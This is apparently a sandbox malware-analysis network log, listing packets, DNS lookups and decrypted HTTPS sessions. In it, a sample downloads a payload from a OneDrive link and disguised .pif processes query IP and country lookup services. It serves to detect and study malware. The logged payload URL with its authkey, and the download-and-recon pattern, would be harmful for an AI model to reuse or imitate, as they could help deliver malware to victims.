Feb 8, 2024 15:21:21.377914906 CET	443	49709	54.145.184.72	192.168.2.8
Feb 8, 2024 15:21:21.377964020 CET	49709	443	192.168.2.8	54.145.184.72
Feb 8, 2024 15:21:21.377969980 CET	443	49709	54.145.184.72	192.168.2.8
Feb 8, 2024 15:21:24.703289032 CET	49712	443	192.168.2.8	13.107.137.11
Feb 8, 2024 15:21:24.703335047 CET	443	49712	13.107.137.11	192.168.2.8
Feb 8, 2024 15:21:24.703402996 CET	49712	443	192.168.2.8	13.107.137.11
Feb 8, 2024 15:21:24.703649044 CET	49712	443	192.168.2.8	13.107.137.11
Feb 8, 2024 15:21:24.703694105 CET	443	49712	13.107.137.11	192.168.2.8
Feb 8, 2024 15:21:24.703747034 CET	49712	443	192.168.2.8	13.107.137.11
Feb 8, 2024 15:21:24.782908916 CET	49713	443	192.168.2.8	13.107.137.11
Feb 8, 2024 15:21:24.782959938 CET	443	49713	13.107.137.11	192.168.2.8
Feb 8, 2024 15:21:24.783024073 CET	49713	443	192.168.2.8	13.107.137.11
Feb 8, 2024 15:21:24.785044909 CET	49713	443	192.168.2.8	13.107.137.11
Feb 8, 2024 15:21:24.785067081 CET	443	49713	13.107.137.11	192.168.2.8
Feb 8, 2024 15:21:25.139935970 CET	443	49713	13.107.137.11	192.168.2.8
Feb 8, 2024 15:21:25.140010118 CET	49713	443	192.168.2.8	13.107.137.11
Feb 8, 2024 15:21:25.142060995 CET	49713	443	192.168.2.8	13.107.137.11
Feb 8, 2024 15:21:25.142070055 CET	443	49713	13.107.137.11	192.168.2.8
Feb 8, 2024 15:21:25.142322063 CET	443	49713	13.107.137.11	192.168.2.8
Feb 8, 2024 15:21:25.225116968 CET	49713	443	192.168.2.8	13.107.137.11
Feb 8, 2024 15:21:25.269911051 CET	443	49713	13.107.137.11	192.168.2.8
Feb 8, 2024 15:21:25.529469013 CET	443	49713	13.107.137.11	192.168.2.8
Feb 8, 2024 15:21:25.529567003 CET	443	49713	13.107.137.11	192.168.2.8
Feb 8, 2024 15:21:25.530123949 CET	49713	443	192.168.2.8	13.107.137.11
Feb 8, 2024 15:21:25.539712906 CET	49713	443	192.168.2.8	13.107.137.11
Feb 8, 2024 15:21:25.539762020 CET	443	49713	13.107.137.11	192.168.2.8
Feb 8, 2024 15:21:33.813987970 CET	49715	443	192.168.2.8	13.107.137.11
Feb 8, 2024 15:21:33.814033031 CET	443	49715	13.107.137.11	192.168.2.8
Feb 8, 2024 15:21:33.814104080 CET	49715	443	192.168.2.8	13.107.137.11
Feb 8, 2024 15:21:33.815258026 CET	49715	443	192.168.2.8	13.107.137.11
Feb 8, 2024 15:21:33.815304995 CET	443	49715	13.107.137.11	192.168.2.8
Feb 8, 2024 15:21:33.815352917 CET	49715	443	192.168.2.8	13.107.137.11
Feb 8, 2024 15:21:33.996747017 CET	49716	443	192.168.2.8	13.107.137.11
Feb 8, 2024 15:21:33.996795893 CET	443	49716	13.107.137.11	192.168.2.8
Feb 8, 2024 15:21:33.996855021 CET	49716	443	192.168.2.8	13.107.137.11
Feb 8, 2024 15:21:33.999284983 CET	49716	443	192.168.2.8	13.107.137.11
Feb 8, 2024 15:21:33.999310970 CET	443	49716	13.107.137.11	192.168.2.8
Feb 8, 2024 15:21:34.375266075 CET	443	49716	13.107.137.11	192.168.2.8
Feb 8, 2024 15:21:34.375341892 CET	49716	443	192.168.2.8	13.107.137.11
Feb 8, 2024 15:21:34.473835945 CET	49716	443	192.168.2.8	13.107.137.11
Feb 8, 2024 15:21:34.473858118 CET	443	49716	13.107.137.11	192.168.2.8
Feb 8, 2024 15:21:34.474318027 CET	443	49716	13.107.137.11	192.168.2.8
Feb 8, 2024 15:21:34.566730976 CET	49716	443	192.168.2.8	13.107.137.11
Feb 8, 2024 15:21:34.830005884 CET	49716	443	192.168.2.8	13.107.137.11
Feb 8, 2024 15:21:34.873908043 CET	443	49716	13.107.137.11	192.168.2.8
Feb 8, 2024 15:21:35.129344940 CET	443	49716	13.107.137.11	192.168.2.8
Feb 8, 2024 15:21:35.129551888 CET	443	49716	13.107.137.11	192.168.2.8
Feb 8, 2024 15:21:35.129612923 CET	49716	443	192.168.2.8	13.107.137.11
Feb 8, 2024 15:21:35.140103102 CET	49716	443	192.168.2.8	13.107.137.11
Feb 8, 2024 15:21:35.140134096 CET	443	49716	13.107.137.11	192.168.2.8
Feb 8, 2024 15:21:35.140151978 CET	49716	443	192.168.2.8	13.107.137.11
Feb 8, 2024 15:21:35.140160084 CET	443	49716	13.107.137.11	192.168.2.8
Feb 8, 2024 15:21:35.218928099 CET	49718	443	192.168.2.8	34.117.186.192
Feb 8, 2024 15:21:35.218976974 CET	443	49718	34.117.186.192	192.168.2.8
Feb 8, 2024 15:21:35.219048023 CET	49718	443	192.168.2.8	34.117.186.192
Feb 8, 2024 15:21:35.221725941 CET	49718	443	192.168.2.8	34.117.186.192
Feb 8, 2024 15:21:35.221745014 CET	443	49718	34.117.186.192	192.168.2.8
Feb 8, 2024 15:21:35.436554909 CET	443	49718	34.117.186.192	192.168.2.8
Feb 8, 2024 15:21:35.447267056 CET	49718	443	192.168.2.8	34.117.186.192
Feb 8, 2024 15:21:35.447282076 CET	443	49718	34.117.186.192	192.168.2.8
Feb 8, 2024 15:21:35.458133936 CET	49718	443	192.168.2.8	34.117.186.192
Feb 8, 2024 15:21:35.458142042 CET	443	49718	34.117.186.192	192.168.2.8
Feb 8, 2024 15:21:35.459693909 CET	443	49718	34.117.186.192	192.168.2.8
Feb 8, 2024 15:21:35.459861040 CET	49718	443	192.168.2.8	34.117.186.192
Feb 8, 2024 15:21:38.069103956 CET	49718	443	192.168.2.8	34.117.186.192
Feb 8, 2024 15:21:38.069542885 CET	443	49718	34.117.186.192	192.168.2.8
Feb 8, 2024 15:21:38.070733070 CET	49718	443	192.168.2.8	34.117.186.192
Feb 8, 2024 15:21:38.070763111 CET	443	49718	34.117.186.192	192.168.2.8
Feb 8, 2024 15:21:38.152616024 CET	49718	443	192.168.2.8	34.117.186.192
Feb 8, 2024 15:21:38.204361916 CET	443	49718	34.117.186.192	192.168.2.8
Feb 8, 2024 15:21:38.204592943 CET	443	49718	34.117.186.192	192.168.2.8
Feb 8, 2024 15:21:38.204669952 CET	49718	443	192.168.2.8	34.117.186.192
Feb 8, 2024 15:21:38.230279922 CET	49718	443	192.168.2.8	34.117.186.192
Feb 8, 2024 15:21:38.230307102 CET	443	49718	34.117.186.192	192.168.2.8
Feb 8, 2024 15:21:38.230321884 CET	49718	443	192.168.2.8	34.117.186.192
Feb 8, 2024 15:21:38.230328083 CET	443	49718	34.117.186.192	192.168.2.8
Feb 8, 2024 15:21:39.428236961 CET	49719	443	192.168.2.8	54.145.184.72
Feb 8, 2024 15:21:39.428272009 CET	443	49719	54.145.184.72	192.168.2.8
Feb 8, 2024 15:21:39.428345919 CET	49719	443	192.168.2.8	54.145.184.72
Feb 8, 2024 15:21:39.431210041 CET	49719	443	192.168.2.8	54.145.184.72
Feb 8, 2024 15:21:39.431221962 CET	443	49719	54.145.184.72	192.168.2.8
Feb 8, 2024 15:21:39.670423985 CET	443	49719	54.145.184.72	192.168.2.8
Feb 8, 2024 15:21:39.671338081 CET	49719	443	192.168.2.8	54.145.184.72
Feb 8, 2024 15:21:39.671344042 CET	443	49719	54.145.184.72	192.168.2.8
Feb 8, 2024 15:21:39.671883106 CET	49719	443	192.168.2.8	54.145.184.72
Feb 8, 2024 15:21:39.671886921 CET	443	49719	54.145.184.72	192.168.2.8
Feb 8, 2024 15:21:39.675451040 CET	443	49719	54.145.184.72	192.168.2.8
Feb 8, 2024 15:21:39.675534010 CET	49719	443	192.168.2.8	54.145.184.72
Feb 8, 2024 15:21:39.728502989 CET	49719	443	192.168.2.8	54.145.184.72
Feb 8, 2024 15:21:39.728697062 CET	443	49719	54.145.184.72	192.168.2.8
Feb 8, 2024 15:21:39.730185986 CET	49719	443	192.168.2.8	54.145.184.72
Feb 8, 2024 15:21:39.730199099 CET	443	49719	54.145.184.72	192.168.2.8
Feb 8, 2024 15:21:39.937902927 CET	443	49719	54.145.184.72	192.168.2.8
Feb 8, 2024 15:21:39.937949896 CET	49719	443	192.168.2.8	54.145.184.72
Feb 8, 2024 15:21:39.941142082 CET	443	49719	54.145.184.72	192.168.2.8
Feb 8, 2024 15:21:39.941220045 CET	49719	443	192.168.2.8	54.145.184.72
Feb 8, 2024 15:21:39.941225052 CET	443	49719	54.145.184.72	192.168.2.8
Feb 8, 2024 15:21:39.941334009 CET	443	49719	54.145.184.72	192.168.2.8
Feb 8, 2024 15:21:39.941380024 CET	49719	443	192.168.2.8	54.145.184.72
Feb 8, 2024 15:21:39.941678047 CET	49719	443	192.168.2.8	54.145.184.72
Feb 8, 2024 15:21:39.941695929 CET	443	49719	54.145.184.72	192.168.2.8
Feb 8, 2024 15:21:39.941708088 CET	49719	443	192.168.2.8	54.145.184.72
Feb 8, 2024 15:21:39.941713095 CET	443	49719	54.145.184.72	192.168.2.8
Feb 8, 2024 15:21:43.278338909 CET	49720	443	192.168.2.8	34.117.186.192
Feb 8, 2024 15:21:43.278369904 CET	443	49720	34.117.186.192	192.168.2.8
Feb 8, 2024 15:21:43.278439999 CET	49720	443	192.168.2.8	34.117.186.192
Feb 8, 2024 15:21:43.322192907 CET	49720	443	192.168.2.8	34.117.186.192
Feb 8, 2024 15:21:43.322228909 CET	443	49720	34.117.186.192	192.168.2.8
Feb 8, 2024 15:21:43.533658028 CET	443	49720	34.117.186.192	192.168.2.8
Feb 8, 2024 15:21:43.553481102 CET	49720	443	192.168.2.8	34.117.186.192
Feb 8, 2024 15:21:43.553505898 CET	443	49720	34.117.186.192	192.168.2.8
Feb 8, 2024 15:21:43.559925079 CET	49720	443	192.168.2.8	34.117.186.192
Feb 8, 2024 15:21:43.559930086 CET	443	49720	34.117.186.192	192.168.2.8
Feb 8, 2024 15:21:43.561172009 CET	443	49720	34.117.186.192	192.168.2.8
Feb 8, 2024 15:21:43.561233997 CET	49720	443	192.168.2.8	34.117.186.192
Feb 8, 2024 15:21:44.039295912 CET	49720	443	192.168.2.8	34.117.186.192
Feb 8, 2024 15:21:44.039530039 CET	443	49720	34.117.186.192	192.168.2.8
Feb 8, 2024 15:21:44.040786028 CET	49720	443	192.168.2.8	34.117.186.192
Feb 8, 2024 15:21:44.040818930 CET	443	49720	34.117.186.192	192.168.2.8
Feb 8, 2024 15:21:44.169554949 CET	443	49720	34.117.186.192	192.168.2.8
Feb 8, 2024 15:21:44.169621944 CET	49720	443	192.168.2.8	34.117.186.192
Feb 8, 2024 15:21:44.199474096 CET	49720	443	192.168.2.8	34.117.186.192
Feb 8, 2024 15:21:44.199501991 CET	443	49720	34.117.186.192	192.168.2.8
Feb 8, 2024 15:21:44.199542046 CET	49720	443	192.168.2.8	34.117.186.192
Feb 8, 2024 15:21:44.199548006 CET	443	49720	34.117.186.192	192.168.2.8
Feb 8, 2024 15:21:46.334753036 CET	49721	443	192.168.2.8	54.145.184.72
Feb 8, 2024 15:21:46.334829092 CET	443	49721	54.145.184.72	192.168.2.8
Feb 8, 2024 15:21:46.334929943 CET	49721	443	192.168.2.8	54.145.184.72
Feb 8, 2024 15:21:46.336875916 CET	49721	443	192.168.2.8	54.145.184.72
Feb 8, 2024 15:21:46.336906910 CET	443	49721	54.145.184.72	192.168.2.8
Feb 8, 2024 15:21:46.570215940 CET	443	49721	54.145.184.72	192.168.2.8
Feb 8, 2024 15:21:46.583734989 CET	49721	443	192.168.2.8	54.145.184.72
Feb 8, 2024 15:21:46.583756924 CET	443	49721	54.145.184.72	192.168.2.8
Feb 8, 2024 15:21:46.584248066 CET	49721	443	192.168.2.8	54.145.184.72
Feb 8, 2024 15:21:46.584254980 CET	443	49721	54.145.184.72	192.168.2.8
Feb 8, 2024 15:21:46.585422039 CET	443	49721	54.145.184.72	192.168.2.8
Feb 8, 2024 15:21:46.587774992 CET	49721	443	192.168.2.8	54.145.184.72
Feb 8, 2024 15:21:46.594454050 CET	49721	443	192.168.2.8	54.145.184.72
Feb 8, 2024 15:21:46.594583035 CET	443	49721	54.145.184.72	192.168.2.8
Feb 8, 2024 15:21:46.626082897 CET	49721	443	192.168.2.8	54.145.184.72
Feb 8, 2024 15:21:46.626099110 CET	443	49721	54.145.184.72	192.168.2.8
Feb 8, 2024 15:21:46.758795023 CET	49721	443	192.168.2.8	54.145.184.72
Feb 8, 2024 15:21:46.840259075 CET	443	49721	54.145.184.72	192.168.2.8
Feb 8, 2024 15:21:46.840348005 CET	443	49721	54.145.184.72	192.168.2.8
Feb 8, 2024 15:21:46.840528011 CET	49721	443	192.168.2.8	54.145.184.72
Feb 8, 2024 15:21:46.871994019 CET	49721	443	192.168.2.8	54.145.184.72
Feb 8, 2024 15:21:46.871994019 CET	49721	443	192.168.2.8	54.145.184.72
Feb 8, 2024 15:21:46.872041941 CET	443	49721	54.145.184.72	192.168.2.8
Feb 8, 2024 15:21:46.872060061 CET	443	49721	54.145.184.72	192.168.2.8

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Feb 8, 2024 15:21:04.902021885 CET	59842	53	192.168.2.8	1.1.1.1
Feb 8, 2024 15:21:05.998243093 CET	64504	53	192.168.2.8	1.1.1.1
Feb 8, 2024 15:21:17.031647921 CET	53789	53	192.168.2.8	1.1.1.1
Feb 8, 2024 15:21:17.154551029 CET	53	53789	1.1.1.1	192.168.2.8
Feb 8, 2024 15:21:20.723367929 CET	49373	53	192.168.2.8	1.1.1.1
Feb 8, 2024 15:21:20.841051102 CET	53	49373	1.1.1.1	192.168.2.8

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Feb 8, 2024 15:21:04.902021885 CET	192.168.2.8	1.1.1.1	0xfd7f	Standard query (0)	onedrive.live.com	A (IP address)	IN (0x0001)	false
Feb 8, 2024 15:21:05.998243093 CET	192.168.2.8	1.1.1.1	0xd9bc	Standard query (0)	6vq0og.dm.files.1drv.com	A (IP address)	IN (0x0001)	false
Feb 8, 2024 15:21:17.031647921 CET	192.168.2.8	1.1.1.1	0xb761	Standard query (0)	ipinfo.io	A (IP address)	IN (0x0001)	false
Feb 8, 2024 15:21:20.723367929 CET	192.168.2.8	1.1.1.1	0x9e2c	Standard query (0)	checkip.amazonaws.com	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Feb 8, 2024 15:21:05.020081043 CET	1.1.1.1	192.168.2.8	0xfd7f	No error (0)	onedrive.live.com	web.fe.1drv.com		CNAME (Canonical name)	IN (0x0001)	false
Feb 8, 2024 15:21:05.020081043 CET	1.1.1.1	192.168.2.8	0xfd7f	No error (0)	web.fe.1drv.com	odc-web-geo.onedrive.akadns.net		CNAME (Canonical name)	IN (0x0001)	false
Feb 8, 2024 15:21:05.020081043 CET	1.1.1.1	192.168.2.8	0xfd7f	No error (0)	odwebpl.trafficmanager.net.dual-spov-0006.spov-msedge.net	dual-spov-0006.spov-msedge.net		CNAME (Canonical name)	IN (0x0001)	false
Feb 8, 2024 15:21:05.020081043 CET	1.1.1.1	192.168.2.8	0xfd7f	No error (0)	dual-spov-0006.spov-msedge.net		13.107.137.11	A (IP address)	IN (0x0001)	false
Feb 8, 2024 15:21:05.020081043 CET	1.1.1.1	192.168.2.8	0xfd7f	No error (0)	dual-spov-0006.spov-msedge.net		13.107.139.11	A (IP address)	IN (0x0001)	false
Feb 8, 2024 15:21:06.191198111 CET	1.1.1.1	192.168.2.8	0xd9bc	No error (0)	6vq0og.dm.files.1drv.com	dm-files.fe.1drv.com		CNAME (Canonical name)	IN (0x0001)	false
Feb 8, 2024 15:21:06.191198111 CET	1.1.1.1	192.168.2.8	0xd9bc	No error (0)	dm-files.fe.1drv.com	odc-dm-files-geo.onedrive.akadns.net		CNAME (Canonical name)	IN (0x0001)	false
Feb 8, 2024 15:21:17.154551029 CET	1.1.1.1	192.168.2.8	0xb761	No error (0)	ipinfo.io		34.117.186.192	A (IP address)	IN (0x0001)	false
Feb 8, 2024 15:21:20.841051102 CET	1.1.1.1	192.168.2.8	0x9e2c	No error (0)	checkip.amazonaws.com	checkip.check-ip.aws.a2z.com		CNAME (Canonical name)	IN (0x0001)	false
Feb 8, 2024 15:21:20.841051102 CET	1.1.1.1	192.168.2.8	0x9e2c	No error (0)	checkip.check-ip.aws.a2z.com	checkip.us-east-1.prod.check-ip.aws.a2z.com		CNAME (Canonical name)	IN (0x0001)	false
Feb 8, 2024 15:21:20.841051102 CET	1.1.1.1	192.168.2.8	0x9e2c	No error (0)	checkip.us-east-1.prod.check-ip.aws.a2z.com		54.145.184.72	A (IP address)	IN (0x0001)	false
Feb 8, 2024 15:21:20.841051102 CET	1.1.1.1	192.168.2.8	0x9e2c	No error (0)	checkip.us-east-1.prod.check-ip.aws.a2z.com		52.3.138.65	A (IP address)	IN (0x0001)	false
Feb 8, 2024 15:21:20.841051102 CET	1.1.1.1	192.168.2.8	0x9e2c	No error (0)	checkip.us-east-1.prod.check-ip.aws.a2z.com		54.160.28.92	A (IP address)	IN (0x0001)	false
Feb 8, 2024 15:21:20.841051102 CET	1.1.1.1	192.168.2.8	0x9e2c	No error (0)	checkip.us-east-1.prod.check-ip.aws.a2z.com		52.2.23.35	A (IP address)	IN (0x0001)	false
Feb 8, 2024 15:21:20.841051102 CET	1.1.1.1	192.168.2.8	0x9e2c	No error (0)	checkip.us-east-1.prod.check-ip.aws.a2z.com		52.2.49.43	A (IP address)	IN (0x0001)	false
Feb 8, 2024 15:21:20.841051102 CET	1.1.1.1	192.168.2.8	0x9e2c	No error (0)	checkip.us-east-1.prod.check-ip.aws.a2z.com		54.157.17.246	A (IP address)	IN (0x0001)	false
Feb 8, 2024 15:21:20.841051102 CET	1.1.1.1	192.168.2.8	0x9e2c	No error (0)	checkip.us-east-1.prod.check-ip.aws.a2z.com		52.21.186.209	A (IP address)	IN (0x0001)	false
Feb 8, 2024 15:21:20.841051102 CET	1.1.1.1	192.168.2.8	0x9e2c	No error (0)	checkip.us-east-1.prod.check-ip.aws.a2z.com		34.238.47.99	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

onedrive.live.com

ipinfo.io

checkip.amazonaws.com

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.8	49706	13.107.137.11	443	7304	C:\Users\user\Desktop\qDKTsL1y44.exe

Timestamp	Bytes transferred	Direction	Data
2024-02-08 14:21:05 UTC	213	OUT	GET /download?resid=22C765749E54F934%21123&authkey=!AMeDDn457FXvGpE HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Host: onedrive.live.com
2024-02-08 14:21:05 UTC	1176	IN	HTTP/1.1 302 Found Cache-Control: no-cache, no-store Pragma: no-cache Content-Type: text/html Expires: -1 Location: https://6vq0og.dm.files.1drv.com/y4mrGaL_KTVeS-FBZdHUZBFKFSCtn2zK-WNQQkQ3WaNPZIqxbjR5SIPEuqPBPlk17j5H8EdVSc3CRy-lCw02jr4opSXqJnFlw2pvjH1ydCB6RMpuPV45oPonqCu0nukJWhPU-gOMqE4lUGH4j0SU_LlNk-HKaAbZgM4x1LmCf4mZk0klIMvif_QTQpxGcH3t481vw4Hv1Zq7WrA6dZnnm7X2Q/255_Finqiaevxgz?download&psid=1 Set-Cookie: E=P:n/TPL7Eo3Ig=:fA46hR4xiSzcReVE6DIk7iaY6v8VgFs0pQkY2Ruo2JQ=:F; domain=.live.com; path=/ Set-Cookie: xid=9eecf572-b202-4424-93e5-8747562c50a5&&ODSP-ODWEB-ODCF&72; domain=.live.com; path=/ Set-Cookie: xidseq=1; domain=.live.com; path=/ Set-Cookie: LD=; domain=.live.com; expires=Thu, 08-Feb-2024 12:41:05 GMT; path=/ Set-Cookie: wla42=; domain=live.com; expires=Thu, 15-Feb-2024 14:21:05 GMT; path=/ X-Content-Type-Options: nosniff Strict-Transport-Security: max-age=31536000 X-MSNServer: 6cc6b9df7d-wjsrm X-ODWebServer: nameastus2708987-odwebpl X-Cache: CONFIG_NOCACHE X-MSEdge-Ref: Ref A: B0A45686BD4D429DA585AC4C0ED1DC55 Ref B: BN3EDGE1019 Ref C: 2024-02-08T14:21:05Z Date: Thu, 08 Feb 2024 14:21:05 GMT Connection: close Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.8	49708	34.117.186.192	443	7604	C:\Users\Public\Libraries\veaiqniF.pif

Timestamp	Bytes transferred	Direction	Data
2024-02-08 14:21:18 UTC	97	OUT	GET /country HTTP/1.1 Host: ipinfo.io User-Agent: Go-http-client/1.1 Accept-Encoding: gzip
2024-02-08 14:21:18 UTC	504	IN	HTTP/1.1 200 OK server: nginx/1.24.0 date: Thu, 08 Feb 2024 14:21:18 GMT content-type: text/html; charset=utf-8 Content-Length: 3 access-control-allow-origin: * x-frame-options: SAMEORIGIN x-xss-protection: 1; mode=block x-content-type-options: nosniff referrer-policy: strict-origin-when-cross-origin x-envoy-upstream-service-time: 3 via: 1.1 google strict-transport-security: max-age=2592000; includeSubDomains Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close
2024-02-08 14:21:18 UTC	3	IN	Data Raw: 55 53 0a Data Ascii: US

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.8	49709	54.145.184.72	443	7604	C:\Users\Public\Libraries\veaiqniF.pif

Timestamp	Bytes transferred	Direction	Data
2024-02-08 14:21:21 UTC	102	OUT	GET / HTTP/1.1 Host: checkip.amazonaws.com User-Agent: Go-http-client/1.1 Accept-Encoding: gzip
2024-02-08 14:21:21 UTC	118	IN	HTTP/1.1 200 OK Date: Thu, 08 Feb 2024 14:21:21 GMT Server: Not Available Content-Length: 13 Connection: Close
2024-02-08 14:21:21 UTC	13	IN	Data Raw: 38 31 2e 31 38 31 2e 35 37 2e 37 34 0a Data Ascii: 81.181.57.74

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.8	49713	13.107.137.11	443	7860	C:\Users\Public\Libraries\Finqiaev.PIF

Timestamp	Bytes transferred	Direction	Data
2024-02-08 14:21:25 UTC	213	OUT	GET /download?resid=22C765749E54F934%21123&authkey=!AMeDDn457FXvGpE HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Host: onedrive.live.com
2024-02-08 14:21:25 UTC	1176	IN	HTTP/1.1 302 Found Cache-Control: no-cache, no-store Pragma: no-cache Content-Type: text/html Expires: -1 Location: https://6vq0og.dm.files.1drv.com/y4mn9WNtkP0NhvZjQvV5JNkK-eMlDWTl2-vx7V73JKE_frh33VNmO9up7keRF5WdLIezYrkztAhu5AgUp-0-xEUG6-7WTrZnFLnzeiYT2527T6pZFAv88MhddwcZ6gzCTIGvjS-BaeugbnKh9ukierb5lXG5KrjN6GxldXSludZg9AWtO6BUkA8E-czkkdTbVbVUf_iTCc3WpFh1l_c6lL_Og/255_Finqiaevxgz?download&psid=1 Set-Cookie: E=P:YMGIO7Eo3Ig=:HygsmETjEqyRl7L7YCRhD+dXkTa+8FFQ3NiJq6SlZFM=:F; domain=.live.com; path=/ Set-Cookie: xid=a30bb6be-f46f-40ad-8d38-f9a62a98b35a&&ODSP-ODWEB-ODCF&72; domain=.live.com; path=/ Set-Cookie: xidseq=1; domain=.live.com; path=/ Set-Cookie: LD=; domain=.live.com; expires=Thu, 08-Feb-2024 12:41:25 GMT; path=/ Set-Cookie: wla42=; domain=live.com; expires=Thu, 15-Feb-2024 14:21:25 GMT; path=/ X-Content-Type-Options: nosniff Strict-Transport-Security: max-age=31536000 X-MSNServer: 7b77f7cd64-t8zqx X-ODWebServer: nameastus2946819-odwebpl X-Cache: CONFIG_NOCACHE X-MSEdge-Ref: Ref A: 3CCDE56D34AE42A59E3FA43C193ADBD3 Ref B: BN3EDGE1112 Ref C: 2024-02-08T14:21:25Z Date: Thu, 08 Feb 2024 14:21:25 GMT Connection: close Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.8	49716	13.107.137.11	443	8020	C:\Users\Public\Libraries\Finqiaev.PIF

Timestamp	Bytes transferred	Direction	Data
2024-02-08 14:21:34 UTC	213	OUT	GET /download?resid=22C765749E54F934%21123&authkey=!AMeDDn457FXvGpE HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Host: onedrive.live.com
2024-02-08 14:21:35 UTC	1176	IN	HTTP/1.1 302 Found Cache-Control: no-cache, no-store Pragma: no-cache Content-Type: text/html Expires: -1 Location: https://6vq0og.dm.files.1drv.com/y4m3aPqlhZB_0wLdwaGCWc-RXOMCJxbKhzWOWoABTd5e_w-BiQM3UCqeieY-tLRf0haUWjedyE78ca-SlWmj-mvBDIQeKET0OMwogjAWjJa6djTkwRFcikYaT1o9VKBETdgNCXZJbJWYVjKIwXgBc0ixW0j_KAEJgkX6DrRH3ne63b_4JTapCrCD2RdYMF8MphQndOcvw4PLLzg09bBByBupg/255_Finqiaevxgz?download&psid=1 Set-Cookie: E=P:2lVCQbEo3Ig=:mnsm2qkC9xKV0tSFvR7jNsRP1HylCy7bwZVp5Y9OVQY=:F; domain=.live.com; path=/ Set-Cookie: xid=d617a496-14c3-4199-bd78-ff86eec86b6a&&ODSP-ODWEB-ODCF&72; domain=.live.com; path=/ Set-Cookie: xidseq=1; domain=.live.com; path=/ Set-Cookie: LD=; domain=.live.com; expires=Thu, 08-Feb-2024 12:41:34 GMT; path=/ Set-Cookie: wla42=; domain=live.com; expires=Thu, 15-Feb-2024 14:21:35 GMT; path=/ X-Content-Type-Options: nosniff Strict-Transport-Security: max-age=31536000 X-MSNServer: 6cc6b9df7d-lfr9g X-ODWebServer: nameastus2708987-odwebpl X-Cache: CONFIG_NOCACHE X-MSEdge-Ref: Ref A: C699048C3CEF48E2B2FB2D624A2926BE Ref B: BN3EDGE0814 Ref C: 2024-02-08T14:21:34Z Date: Thu, 08 Feb 2024 14:21:34 GMT Connection: close Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.8	49718	34.117.186.192	443	7952	C:\Users\Public\Libraries\veaiqniF.pif

Timestamp	Bytes transferred	Direction	Data
2024-02-08 14:21:38 UTC	97	OUT	GET /country HTTP/1.1 Host: ipinfo.io User-Agent: Go-http-client/1.1 Accept-Encoding: gzip
2024-02-08 14:21:38 UTC	504	IN	HTTP/1.1 200 OK server: nginx/1.24.0 date: Thu, 08 Feb 2024 14:21:38 GMT content-type: text/html; charset=utf-8 Content-Length: 3 access-control-allow-origin: * x-frame-options: SAMEORIGIN x-xss-protection: 1; mode=block x-content-type-options: nosniff referrer-policy: strict-origin-when-cross-origin x-envoy-upstream-service-time: 3 via: 1.1 google strict-transport-security: max-age=2592000; includeSubDomains Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close
2024-02-08 14:21:38 UTC	3	IN	Data Raw: 55 53 0a Data Ascii: US

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.8	49719	54.145.184.72	443	7952	C:\Users\Public\Libraries\veaiqniF.pif

Timestamp	Bytes transferred	Direction	Data
2024-02-08 14:21:39 UTC	102	OUT	GET / HTTP/1.1 Host: checkip.amazonaws.com User-Agent: Go-http-client/1.1 Accept-Encoding: gzip
2024-02-08 14:21:39 UTC	118	IN	HTTP/1.1 200 OK Date: Thu, 08 Feb 2024 14:21:39 GMT Server: Not Available Content-Length: 13 Connection: Close
2024-02-08 14:21:39 UTC	13	IN	Data Raw: 38 31 2e 31 38 31 2e 35 37 2e 37 34 0a Data Ascii: 81.181.57.74

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.8	49720	34.117.186.192	443	5264	C:\Users\Public\Libraries\veaiqniF.pif

Timestamp	Bytes transferred	Direction	Data
2024-02-08 14:21:44 UTC	97	OUT	GET /country HTTP/1.1 Host: ipinfo.io User-Agent: Go-http-client/1.1 Accept-Encoding: gzip
2024-02-08 14:21:44 UTC	504	IN	HTTP/1.1 200 OK server: nginx/1.24.0 date: Thu, 08 Feb 2024 14:21:44 GMT content-type: text/html; charset=utf-8 Content-Length: 3 access-control-allow-origin: * x-frame-options: SAMEORIGIN x-xss-protection: 1; mode=block x-content-type-options: nosniff referrer-policy: strict-origin-when-cross-origin x-envoy-upstream-service-time: 2 via: 1.1 google strict-transport-security: max-age=2592000; includeSubDomains Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close
2024-02-08 14:21:44 UTC	3	IN	Data Raw: 55 53 0a Data Ascii: US

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.8	49721	54.145.184.72	443	5264	C:\Users\Public\Libraries\veaiqniF.pif

Timestamp	Bytes transferred	Direction	Data
2024-02-08 14:21:46 UTC	102	OUT	GET / HTTP/1.1 Host: checkip.amazonaws.com User-Agent: Go-http-client/1.1 Accept-Encoding: gzip
2024-02-08 14:21:46 UTC	118	IN	HTTP/1.1 200 OK Date: Thu, 08 Feb 2024 14:21:46 GMT Server: Not Available Content-Length: 13 Connection: Close
2024-02-08 14:21:46 UTC	13	IN	Data Raw: 38 31 2e 31 38 31 2e 35 37 2e 37 34 0a Data Ascii: 81.181.57.74

Target ID:	0
Start time:	15:21:02
Start date:	08/02/2024
Path:	C:\Users\user\Desktop\qDKTsL1y44.exe
Wow64 process (32bit):	true
